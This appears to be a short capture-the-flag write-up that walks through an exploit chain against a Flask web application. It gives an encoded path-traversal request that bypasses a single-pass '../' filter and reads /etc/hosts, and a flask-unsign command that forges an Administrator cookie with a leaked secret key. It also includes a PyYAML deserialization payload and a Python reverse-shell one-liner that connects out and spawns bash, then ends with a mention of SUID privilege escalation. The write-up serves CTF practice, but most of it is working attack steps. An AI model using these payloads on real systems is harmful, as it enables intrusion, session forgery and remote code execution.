path.join arbitrary file read: the filter replaces ../ with an empty string in a single pass, so doubling it is enough. Each ..././ collapses to ../ after one removal, and the request below reads /etc/hosts.
GET /%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2F%2E%2E%2E%2F%2E%2Fetc%2Fhosts HTTP/1.1
The SECRET_KEY turns out to be engine-1.
Set user to Administrator and updir to .
flask-unsign --sign --cookie "{'updir': '.', 'user': 'Administrator'}" --secret "engine-1"
This gives
eyJ1cGRpciI6Ii4iLCJ1c2VyIjoiQWRtaW5pc3RyYXRvciJ9.Ywgw4A.brsFEnZSsrp86IQFbvHjdwRVkPg
Replace the cookie with it.
Locally, write a file named c4d038b4bed09fdb1471ef51ec3a32cd.yaml
(c4d038b4bed09fdb1471ef51ec3a32cd is md5("114514"))
with the content:
!!python/object/new:bytes
- !!python/object/new:map
- !!python/name:__import__
- ["fileinfo.a"]
Then write an a.py with the content:
import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
Pack the two files into fileinfo.rar.
Upload fileinfo.rar, then /display?file=114514 returns a shell.
Then escalate privileges via SUID.